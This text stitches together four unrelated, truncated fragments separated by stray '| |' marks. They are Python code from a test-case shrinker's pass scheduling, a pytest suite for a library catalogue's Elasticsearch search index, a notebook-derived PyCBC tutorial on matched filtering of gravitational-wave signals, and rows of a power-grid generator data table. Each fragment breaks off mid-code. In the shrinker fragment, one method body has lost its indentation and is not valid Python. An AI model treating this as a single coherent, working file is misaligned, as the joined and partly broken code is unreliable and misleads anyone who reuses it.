    #     v                v  |
    #   AVOID ---------> DUBIOUS
    #
    # From best to worst we want to run HOPEFUL, CANDIDATE, DUBIOUS, AVOID.
    # We will try any one of them if we have to but we want to prioritise.
    #
    # When a run succeeds, a pass will follow an arrow to a better class.
    # When it fails, it will follow an arrow to a worse one.
    # If no such arrow is available, it stays where it is.
    #
    # We also have the classification SPECIAL for passes that do not get
    # run as part of the normal process.
    previous = sp.classification
    # If the pass didn't actually do anything we don't reclassify it. This
    # is for things like remove_discarded which often are inapplicable.
    if calls > 0 and sp.classification != PassClassification.SPECIAL:
        if shrinks == 0:
            if sp.successes > 0:
                sp.classification = PassClassification.DUBIOUS
            else:
                sp.classification = PassClassification.AVOID
        else:
            sp.successes += 1
            if sp.classification == PassClassification.AVOID:
                sp.classification = PassClassification.DUBIOUS
            else:
                sp.classification = PassClassification.HOPEFUL
        if previous != sp.classification:
            self.debug('Reclassified %s from %s to %s' % (
                sp.name, previous.name, sp.classification.name
            ))
def shrink(self):
    """Run the full set of shrinks and update shrink_target.

    This method is "mostly idempotent" - calling it twice is unlikely to
    have any effect, though it has a non-zero probability of doing so.
    """
    # We assume that if an all-zero block of bytes is an interesting
    # example then we're not going to do better than that.
    # This might not technically be true: e.g. for integers() | booleans()
    # the simplest example is actually [1, 0]. Missing this case is fairly
    # harmless and this allows us to make various simplifying assumptions
    # about the structure of the data (principally that we're never
    # operating on a block of all zero bytes so can use non-zeroness as a
    # signpost of complexity).
    if (
        not any(self.shrink_target.buffer) or
        self.incorporate_new_buffer(hbytes(len(self.shrink_target.buffer)))
    ):
        return
    # Profiling output below is emitted even if greedy_shrink raises.
    try:
        self.greedy_shrink()
    finally:
        if self.__engine.report_debug_info:
            # Helper for pluralising counts in the report.
            def s(n):
                return 's' if n != 1 else ''
            total_deleted = self.initial_size - len(
                self.shrink_target.buffer)
            self.debug('---------------------')
            self.debug('Shrink pass profiling')
            self.debug('---------------------')
            self.debug('')
            calls = self.__engine.call_count - self.initial_calls
            self.debug((
                'Shrinking made a total of %d call%s '
                'of which %d shrank. This deleted %d byte%s out of %d.'
            ) % (
                calls, s(calls),
                self.shrinks,
                total_deleted, s(total_deleted),
                self.initial_size,
            ))
            # Report passes that shrank something first, then the rest.
            for useful in [True, False]:
                self.debug('')
                if useful:
                    self.debug('Useful passes:')
                else:
                    self.debug('Useless passes:')
                self.debug('')
                for p in sorted(
                    self.passes,
                    key=lambda t: (
                        -t.calls, -t.runs,
                        t.deletions, t.shrinks,
                    ),
                ):
                    if p.calls == 0:
                        continue
                    if (p.shrinks != 0) != useful:
                        continue
                    self.debug((
                        ' * %s ran %d time%s, making %d call%s of which '
                        '%d shrank, deleting %d byte%s.'
                    ) % (
                        p.name,
                        p.runs, s(p.runs),
                        p.calls, s(p.calls),
                        p.shrinks,
                        p.deletions, s(p.deletions),
                    ))
            self.debug('')
def greedy_shrink(self):
    """Run greedy shrink passes (ones that only ever move to a strictly
    better target) and update shrink_target appropriately.

    Iterating to a fixed point makes this idempotent: a second call has
    exactly the same effect as the first.
    """
    self.run_shrink_pass('alphabet_minimize')
    keep_going = True
    while keep_going:
        keep_going = self.single_greedy_shrink_iteration()
        if keep_going:
            self.run_shrink_pass('lower_common_block_offset')
def single_greedy_shrink_iteration(self):
"""Performs a single run through each greedy shrink pass, but does not
loop to achieve a fixed point."""
initial = self.shrink_target
# What follows is a slightly delicate dance. What we want to do is try
# to ensure that:
#
# 1. If it is possible for us to be deleting data, we should be.
# 2. We do not end up repeating a lot of passes uselessly.
# 3. We do not want to run expensive or useless passes if we can
# possibly avoid doing so.
self.requeue_passes()
self.run_shrink_pass('remove_discarded')
# First run the entire set of solid passes (ones that have previously
# made changes). It's important that we run all of them, not just one,
# as typically each pass may unlock others.
self.run_queued_passes(PassClassification.HOPEFUL)
# While our solid passes are successfully shrinking the buffer, we can
# just keep doing that (note that this is a stronger condition than
# just making shrinks - it's a much better sense of progress. We can
# make only O(n) length reductions but we can make exponentially many
# shrinks).
if len(self.buffer) < len(initial.buffer):
return True
# If we're stuck on length reductions then we pull in one candiate pass
# (if there are any).
# This should hopefully help us unlock any local minima that were
# starting to reduce the utility of the previous solid passes.
self.run_one_queued_pass(PassClassification.CANDIDATE)
# We've pulled in a new candidate pass (or have no candidate passes
# left) and are making shrinks with the solid passes, so lets just
# keep on doing that.
if self.shrink_target is not initial:
return True
# We're a bit stuck, so it's time to try some new passes.
for | |
# encoding: utf-8
import pytest
from collections import defaultdict
import datetime
import json
import logging
import re
import time
from psycopg2.extras import NumericRange
from ..testing import (
DatabaseTest,
)
from elasticsearch_dsl import Q
from elasticsearch_dsl.function import (
ScriptScore,
RandomScore,
)
from elasticsearch_dsl.query import (
Bool,
DisMax,
Query as elasticsearch_dsl_query,
MatchAll,
Match,
MatchNone,
MatchPhrase,
MultiMatch,
Nested,
Range,
Term,
Terms,
)
from elasticsearch.exceptions import ElasticsearchException
from ..config import (
Configuration,
CannotLoadConfiguration,
)
from ..lane import (
Facets,
FeaturedFacets,
Lane,
Pagination,
SearchFacets,
WorkList,
)
from ..metadata_layer import (
ContributorData,
IdentifierData,
)
from ..model import (
ConfigurationSetting,
Contribution,
Contributor,
DataSource,
Edition,
ExternalIntegration,
Genre,
Work,
WorkCoverageRecord,
get_one_or_create,
)
from ..external_search import (
CurrentMapping,
ExternalSearchIndex,
Filter,
Mapping,
MockExternalSearchIndex,
MockSearchResult,
Query,
QueryParser,
SearchBase,
SearchIndexCoverageProvider,
SortKeyPagination,
WorkSearchResult,
mock_search_index,
)
from ..classifier import Classifier
from ..problem_details import INVALID_INPUT
from ..testing import (
ExternalSearchTest,
EndToEndSearchTest,
)
# Elasticsearch Term query matching the lowercased "research" audience value.
RESEARCH = Term(audience=Classifier.AUDIENCE_RESEARCH.lower())
class TestExternalSearch(ExternalSearchTest):
    """Tests for ExternalSearchIndex: loading/construction, index and alias
    management, query plumbing, and self-tests.  These run against the search
    fixture provided by ExternalSearchTest."""
    def test_load(self):
        # Normally, load() returns a brand new ExternalSearchIndex
        # object.
        loaded = ExternalSearchIndex.load(self._db, in_testing=True)
        assert isinstance(loaded, ExternalSearchIndex)
        # However, inside the mock_search_index context manager,
        # load() returns whatever object was mocked.
        mock = object()
        with mock_search_index(mock):
            assert mock == ExternalSearchIndex.load(self._db, in_testing=True)
    def test_constructor(self):
        # The configuration of the search ExternalIntegration becomes the
        # configuration of the ExternalSearchIndex.
        #
        # This basically just verifies that the test search term is taken
        # from the ExternalIntegration.
        class MockIndex(ExternalSearchIndex):
            def set_works_index_and_alias(self, _db):
                self.set_works_index_and_alias_called_with = _db
        index = MockIndex(self._db)
        assert self._db == index.set_works_index_and_alias_called_with
        assert "test_search_term" == index.test_search_term
        # TODO: would be good to check the put_script calls, but the
        # current constructor makes put_script difficult to mock.
    def test_elasticsearch_error_in_constructor_becomes_cannotloadconfiguration(self):
        """If we're unable to establish a connection to the Elasticsearch
        server, CannotLoadConfiguration (which the circulation manager can
        understand) is raised instead of an Elasticsearch-specific exception.
        """
        # Unlike other tests in this module, this one runs even if no
        # ElasticSearch server is running, since it's testing what
        # happens if there's a problem communicating with that server.
        class Mock(ExternalSearchIndex):
            def set_works_index_and_alias(self, _db):
                raise ElasticsearchException("very bad")
        with pytest.raises(CannotLoadConfiguration) as excinfo:
            Mock(self._db)
        assert "Exception communicating with Elasticsearch server: " in str(excinfo.value)
        assert "very bad" in str(excinfo.value)
    def test_works_index_name(self):
        """The name of the search index is the prefix (defined in
        ExternalSearchTest.setup) plus a version number associated
        with this version of the core code.
        """
        assert "test_index-v4" == self.search.works_index_name(self._db)
    def test_setup_index_creates_new_index(self):
        current_index = self.search.works_index
        # This calls self.search.setup_index (which is what we're testing)
        # and also registers the index to be torn down at the end of the test.
        self.setup_index('the_other_index')
        # Both indices exist.
        assert True == self.search.indices.exists(current_index)
        assert True == self.search.indices.exists('the_other_index')
        # The index for the app's search is still the original index.
        assert current_index == self.search.works_index
        # The alias hasn't been passed over to the new index.
        alias = 'test_index-' + self.search.CURRENT_ALIAS_SUFFIX
        assert alias == self.search.works_alias
        assert True == self.search.indices.exists_alias(current_index, alias)
        assert False == self.search.indices.exists_alias('the_other_index', alias)
    def test_set_works_index_and_alias(self):
        # If the index or alias don't exist, set_works_index_and_alias
        # will create them.
        self.integration.set_setting(ExternalSearchIndex.WORKS_INDEX_PREFIX_KEY, u'banana')
        self.search.set_works_index_and_alias(self._db)
        expected_index = 'banana-' + CurrentMapping.version_name()
        expected_alias = 'banana-' + self.search.CURRENT_ALIAS_SUFFIX
        assert expected_index == self.search.works_index
        assert expected_alias == self.search.works_alias
        # If the index and alias already exist, set_works_index_and_alias
        # does nothing.
        self.search.set_works_index_and_alias(self._db)
        assert expected_index == self.search.works_index
        assert expected_alias == self.search.works_alias
    def test_setup_current_alias(self):
        # The index was generated from the string in configuration.
        version = CurrentMapping.version_name()
        index_name = 'test_index-' + version
        assert index_name == self.search.works_index
        assert True == self.search.indices.exists(index_name)
        # The alias is also created from the configuration.
        alias = 'test_index-' + self.search.CURRENT_ALIAS_SUFFIX
        assert alias == self.search.works_alias
        assert True == self.search.indices.exists_alias(index_name, alias)
        # If the -current alias is already set on a different index, it
        # won't be reassigned. Instead, search will occur against the
        # index itself.
        ExternalSearchIndex.reset()
        self.integration.set_setting(ExternalSearchIndex.WORKS_INDEX_PREFIX_KEY, u'my-app')
        self.search = ExternalSearchIndex(self._db)
        assert 'my-app-%s' % version == self.search.works_index
        assert 'my-app-' + self.search.CURRENT_ALIAS_SUFFIX == self.search.works_alias
    def test_transfer_current_alias(self):
        # An error is raised if you try to set the alias to point to
        # an index that doesn't already exist.
        pytest.raises(
            ValueError, self.search.transfer_current_alias, self._db,
            'no-such-index'
        )
        original_index = self.search.works_index
        # If the -current alias doesn't exist, it's created
        # and everything is updated accordingly.
        self.search.indices.delete_alias(
            index=original_index, name='test_index-current', ignore=[404]
        )
        self.setup_index(new_index='test_index-v9999')
        self.search.transfer_current_alias(self._db, 'test_index-v9999')
        assert 'test_index-v9999' == self.search.works_index
        assert 'test_index-current' == self.search.works_alias
        # If the -current alias already exists on the index,
        # it's used without a problem.
        self.search.transfer_current_alias(self._db, 'test_index-v9999')
        assert 'test_index-v9999' == self.search.works_index
        assert 'test_index-current' == self.search.works_alias
        # If the -current alias is being used on a different version of the
        # index, it's deleted from that index and placed on the new one.
        self.setup_index(original_index)
        self.search.transfer_current_alias(self._db, original_index)
        assert original_index == self.search.works_index
        assert 'test_index-current' == self.search.works_alias
        # It has been removed from other index.
        assert False == self.search.indices.exists_alias(
            index='test_index-v9999', name='test_index-current')
        # And only exists on the new index.
        # NOTE(review): .keys() returns a view on Python 3, where comparing it
        # to a list is always False -- this comparison relies on Python 2
        # list semantics; confirm before porting.
        alias_indices = self.search.indices.get_alias(name='test_index-current').keys()
        assert [original_index] == alias_indices
        # If the index doesn't have the same base name, an error is raised.
        pytest.raises(
            ValueError, self.search.transfer_current_alias, self._db,
            'banana-v10'
        )
    def test_query_works(self):
        # Verify that query_works operates by calling query_works_multi.
        # The actual functionality of query_works and query_works_multi
        # have many end-to-end tests in TestExternalSearchWithWorks.
        class Mock(ExternalSearchIndex):
            def __init__(self):
                self.query_works_multi_calls = []
                self.queued_results = []
            def query_works_multi(self, queries, debug=False):
                self.query_works_multi_calls.append((queries, debug))
                return self.queued_results.pop()
        search = Mock()
        # If the filter is designed to match nothing,
        # query_works_multi isn't even called -- we just return an
        # empty list.
        query = object()
        pagination = object()
        filter = Filter(match_nothing=True)
        assert [] == search.query_works(query, filter, pagination)
        assert [] == search.query_works_multi_calls
        # Otherwise, query_works_multi is called with a list
        # containing a single query, and the list of resultsets is
        # turned into a single list of results.
        search.queued_results.append([["r1", "r2"]])
        filter = object()
        results = search.query_works(query, filter, pagination)
        assert ["r1", "r2"] == results
        call = search.query_works_multi_calls.pop()
        assert ([(query, filter, pagination)], False) == call
        assert [] == search.query_works_multi_calls
        # If no Pagination object is provided, a default is used.
        search.queued_results.append([["r3", "r4"]])
        results = search.query_works(query, filter, None, True)
        assert ["r3", "r4"] == results
        ([query_tuple], debug) = search.query_works_multi_calls.pop()
        assert True == debug
        assert query == query_tuple[0]
        assert filter == query_tuple[1]
        pagination = query_tuple[2]
        default = Pagination.default()
        assert isinstance(pagination, Pagination)
        assert pagination.offset == default.offset
        assert pagination.size == default.size
    def test__run_self_tests(self):
        index = MockExternalSearchIndex()
        # First, see what happens when the search returns no results.
        test_results = [x for x in index._run_self_tests(self._db, in_testing=True)]
        assert "Search results for 'a search term':" == test_results[0].name
        assert True == test_results[0].success
        assert [] == test_results[0].result
        assert "Search document for 'a search term':" == test_results[1].name
        assert True == test_results[1].success
        assert "[]" == test_results[1].result
        assert "Raw search results for 'a search term':" == test_results[2].name
        assert True == test_results[2].success
        assert [] == test_results[2].result
        assert "Total number of search results for 'a search term':" == test_results[3].name
        assert True == test_results[3].success
        assert "0" == test_results[3].result
        assert "Total number of documents in this search index:" == test_results[4].name
        assert True == test_results[4].success
        assert "0" == test_results[4].result
        assert "Total number of documents per collection:" == test_results[5].name
        assert True == test_results[5].success
        assert "{}" == test_results[5].result
        # Set up the search index so it will return a result.
        collection = self._collection()
        search_result = MockSearchResult(
            "Sample Book Title", "author", {}, "id"
        )
        index.index("index", "doc type", "id", search_result)
        test_results = [x for x in index._run_self_tests(self._db, in_testing=True)]
        assert "Search results for 'a search term':" == test_results[0].name
        assert True == test_results[0].success
        assert ["Sample Book Title (author)"] == test_results[0].result
        assert "Search document for 'a search term':" == test_results[1].name
        assert True == test_results[1].success
        result = json.loads(test_results[1].result)
        sample_book = {"author": "author", "meta": {"id": "id", "_sort": [u'Sample Book Title', u'author', u'id']}, "id": "id", "title": "Sample Book Title"}
        assert sample_book == result
        assert "Raw search results for 'a search term':" == test_results[2].name
        assert True == test_results[2].success
        result = json.loads(test_results[2].result[0])
        assert sample_book == result
        assert "Total number of search results for 'a search term':" == test_results[3].name
        assert True == test_results[3].success
        assert "1" == test_results[3].result
        assert "Total number of documents in this search index:" == test_results[4].name
        assert True == test_results[4].success
        assert "1" == test_results[4].result
        assert "Total number of documents per collection:" == test_results[5].name
        assert True == test_results[5].success
        result = json.loads(test_results[5].result)
        assert {collection.name: 1} == result
class TestCurrentMapping(object):
def test_character_filters(self):
# Verify the functionality of the regular | |
#!/usr/bin/env python
# coding: utf-8
# <img style="float: left;padding: 1.3em" src="https://indico.in2p3.fr/event/18313/logo-786578160.png">
#
# # Gravitational Wave Open Data Workshop #3
#
#
# ## Tutorial 2.1 PyCBC Tutorial, An introduction to matched-filtering
#
# We will be using the [PyCBC](http://github.com/ligo-cbc/pycbc) library, which is used to study gravitational-wave data, find astrophysical sources due to compact binary mergers, and study their parameters. These are some of the same tools that the LIGO and Virgo collaborations use to find gravitational waves in LIGO/Virgo data
#
# In this tutorial we will walk through how to find a specific signal in LIGO data. We present matched filtering as a cross-correlation, in both the time domain and the frequency domain. In the next tutorial (2.2), we use the method as encoded in PyCBC, which is optimal in the case of Gaussian noise and a known signal model. In reality our noise is not entirely Gaussian, and in practice we use a variety of techniques to separate signals from noise in addition to the use of the matched filter.
#
# [Click this link to view this tutorial in Google Colaboratory](https://colab.research.google.com/github/gw-odw/odw-2020/blob/master/Day_2/Tuto_2.1_Matched_filtering_introduction.ipynb)
#
# Additional [examples](http://pycbc.org/pycbc/latest/html/#library-examples-and-interactive-tutorials) and module level documentation are [here](http://pycbc.org/pycbc/latest/html/py-modindex.html)
# ## Installation (un-comment and execute only if running on a cloud platform!)
# In[1]:
# -- Use the following for Google Colab
#! pip install -q 'lalsuite==6.66' 'PyCBC==1.15.3'
# **Important:** With Google Colab, you may need to restart the runtime after running the cell above.
# ### Matched-filtering: Finding well modelled signals in Gaussian noise
#
# Matched filtering can be shown to be the optimal method for "detecting" signals---when the signal waveform is known---in Gaussian noise. We'll explore those assumptions a little later, but for now let's demonstrate how this works.
#
# Let's assume you have a stretch of noise, white noise to start:
# In[162]:
get_ipython().run_line_magic('matplotlib', 'inline')
import numpy
import pylab
# specify the sample rate.
# LIGO raw data is sampled at 16384 Hz (=2^14 samples/second).
# It captures signal frequency content up to f_Nyquist = 8192 Hz.
# Here, we will make the computation faster by sampling at a lower rate.
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
# And then let's add a gravitational wave signal to some random part of this data.
# In[163]:
from pycbc.waveform import get_td_waveform
# the "approximant" (jargon for parameterized waveform family).
# IMRPhenomD is defined in the frequency domain, but we'll get it in the time domain (td).
# It runs fast, but it doesn't include effects such as non-aligned component spin, or higher order modes.
apx = 'IMRPhenomD'
# You can specify many parameters,
# https://pycbc.org/pycbc/latest/html/pycbc.waveform.html?highlight=get_td_waveform#pycbc.waveform.waveform.get_td_waveform
# but here, we'll use defaults for everything except the masses.
# It returns both hplus and hcross, but we'll only use hplus for now.
hp1, _ = get_td_waveform(approximant=apx,
mass1=10,
mass2=10,
delta_t=1.0/sample_rate,
f_lower=25)
# The amplitude of gravitational-wave signals is normally of order 1E-20. To demonstrate our method
# on white noise with amplitude O(1) we normalize our signal so the cross-correlation of the signal with
# itself will give a value of 1. In this case we can interpret the cross-correlation of the signal with white
# noise as a signal-to-noise ratio.
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# note that in this figure, the waveform amplitude is of order 1.
# The duration (for frequency above f_lower=25 Hz) is only 3 or 4 seconds long.
# The waveform is "tapered": slowly ramped up from zero to full strength, over the first second or so.
# It is zero-padded at earlier times.
pylab.figure()
pylab.title("The waveform hp1")
pylab.plot(hp1.sample_times, hp1)
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
pylab.figure()
pylab.title("Looks like random noise, right?")
pylab.plot(hp1.sample_times, data[waveform_start:waveform_start+len(hp1)])
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
pylab.figure()
pylab.title("Signal in the data")
pylab.plot(hp1.sample_times, data[waveform_start:waveform_start+len(hp1)])
pylab.plot(hp1.sample_times, 10 * hp1)
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
# To search for this signal we can cross-correlate the signal with the entire dataset -> Not in any way optimized at this point, just showing the method.
#
# We will do the cross-correlation in the time domain, once for each time step. It runs slowly...
# In[164]:
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
# plot the cross-correlated data vs time. Superimpose the location of the end of the signal;
# this is where we should find a peak in the cross-correlation.
pylab.figure()
times = numpy.arange(len(data) - len(hp1_numpy)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)], [-10,10],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# The largest spike in the cross-correlation comes at the time of the signal.
# The remaining ingredient needed to describe matched filtering is "colored"
# noise: Gaussian noise with a frequency-dependent variance (white noise has a
# frequency-independent variance).
#
# Repeat the process on a stretch of data colored with LIGO's
# zero-detuned--high-power noise curve, generated with a PyCBC library.
# In[165]:
# http://pycbc.org/pycbc/latest/html/noise.html
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0  # low-frequency cutoff (Hz)
delta_f = 1.0 / 128  # frequency resolution of the analytic PSD
flen = int(sample_rate / (2 * delta_f)) + 1  # number of frequency samples up to Nyquist
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise with that spectrum.
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method: 4-second PSD segments that are overlapped 50%.
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# Compare the Welch estimate against the known analytic PSD:
pylab.loglog(estimated_psd.sample_frequencies, estimated_psd, label='estimate')
pylab.loglog(psd.sample_frequencies, psd, linewidth=3, label='known psd')
pylab.xlim(xmin=flow, xmax=512)  # NOTE(review): xmin/xmax kwargs are deprecated in newer matplotlib (use left/right) -- confirm version
pylab.ylim(1e-47, 1e-45)
pylab.legend()
pylab.grid()
pylab.show()
# Inject the signal into the colored noise, this time with a "typical"
# strain amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# To matched-filter we "whiten" both the data and the template waveform: divide
# by the PSD in the frequency domain. This *can* be done in the time domain as
# well, but it's more intuitive in the frequency domain.
# In[166]:
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data (delta_f = 1 / duration of `ts`)
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal (delta_f = 1 / duration of `hp1`)
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# Convert both the noisy data and the signal to the frequency domain, divide
# each by ASD = PSD**0.5, then convert back to the time domain. This "whitens"
# the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
# In[167]:
# Re-do the correlation, in the time domain, but with whitened data and template.
cross_correlation = numpy.zeros([len(data)-len(hp1)])  # NOTE(review): sized from `data`/`hp1`; assumes `data_whitened`/`hp1_whitened` have the same lengths -- confirm
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
    cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# Plot the whitened cross-correlation and mark the injection offset. Note how
# much bigger the peak is, relative to the noise level, compared with the
# unwhitened version of the same quantity -- the SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
           [(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# # Challenge!
#
# * Histogram the whitened time series. Ignoring the outliers associated with the signal, is it a Gaussian? What is the mean and standard deviation? (We have not been careful in normalizing the whitened data properly).
# * Histogram the above cross-correlation time series. Ignoring the outliers associated with the signal, is it a Gaussian? What is the mean and standard deviation?
# * Find the location of the peak. (Note that here, it can be positive or negative), and the value of the SNR of the signal (which is the absolute value of the peak value, divided by | |
0, 0, 0, 0],
[1109, 0.617493, 0, 9999, -9999, 1.0, 100, 1, 0.77821, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1110, 1.394187, 0, 9999, -9999, 1.0, 100, 1, 1.654557, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1111, 40.889352, 0, 9999, -9999, 1.0, 100, 1, 89.637993, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1112, 35.407461, 0, 9999, -9999, 1.0, 100, 1, 69.53429, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1113, 1.90406, 0, 9999, -9999, 1.0, 100, 1, 3.536361, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1114, 4.502525, 0, 9999, -9999, 1.0, 100, 1, 13.446889, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1115, 26.798092, 0, 9999, -9999, 1.0, 100, 1, 50.575278, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1116, 14.610523, 0, 9999, -9999, 1.0, 100, 1, 32.601142, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1117, 39.481254, 0, 9999, -9999, 1.0, 100, 1, 90.792541, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1118, 5.937002, 0, 9999, -9999, 1.0, 100, 1, 8.725012, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1119, 18.54768, 0, 9999, -9999, 1.0, 100, 1, 43.254023, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1120, 1.836916, 0, 9999, -9999, 1.0, 100, 1, 2.416001, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1121, 0.366174, 0, 9999, -9999, 1.0, 100, 1, 0.540589, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1122, 1.073929, 0, 9999, -9999, 1.0, 100, 1, 1.462883, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1123, 0.746002, 0, 9999, -9999, 1.0, 100, 1, 1.464336, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1124, 0.82072, 0, 9999, -9999, 1.0, 100, 1, 1.288283, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1125, 19.968941, 0, 9999, -9999, 1.0, 100, 1, 25.818899, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1126, 22.936377, 0, 9999, -9999, 1.0, 100, 1, 29.154893, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1127, 75.13808, 0, 9999, -9999, 1.0, 100, 1, 105.296621, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1128, 2.603305, 0, 9999, -9999, 1.0, 100, 1, 3.06139, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1129, 3.989518, 0, 9999, -9999, 1.0, 100, 1, 4.738747, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1130, 0.866541, 0, 9999, -9999, 1.0, 100, 1, 1.025754, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1131, 2.439245, 0, 9999, -9999, 1.0, 100, 1, 2.897078, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1132, 0.30391, 0, 9999, -9999, 1.0, 100, 1, 0.359497, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1133, 0.487427, 0, 9999, -9999, 1.0, 100, 1, 0.719597, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1134, 0.344405, 0, 9999, -9999, 1.0, 100, 1, 0.508453, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1135, 5.771651, 0, 9999, -9999, 1.0, 100, 1, 8.117819, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1136, 0.268789, 0, 9999, -9999, 1.0, 100, 1, 0.4027, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1137, 2.00207, 0, 9999, -9999, 1.0, 100, 1, 3.669012, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1138, 0.797752, 0, 9999, -9999, 1.0, 100, 1, 1.254278, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1139, 10.163676, 0, 9999, -9999, 1.0, 100, 1, 19.822769, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1140, 11.999834, 0, 9999, -9999, 1.0, 100, 1, 28.389457, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1141, 65.218706, 0, 9999, -9999, 1.0, 100, 1, 119.46456, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1142, 0.848405, 0, 9999, -9999, 1.0, 100, 1, 1.215733, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1143, 17.658705, 0, 9999, -9999, 1.0, 100, 1, 25.239356, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1144, 29.127723, 0, 9999, -9999, 1.0, 100, 1, 52.527382, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1146, 0.583423, 0, 9999, -9999, 1.0, 100, 1, 0.861317, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1147, 24.223472, 0, 9999, -9999, 1.0, 100, 1, 45.703707, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1148, 15.214504, 0, 9999, -9999, 1.0, 100, 1, 17.645529, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1149, 6.710653, 0, 9999, -9999, 1.0, 100, 1, 8.556784, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
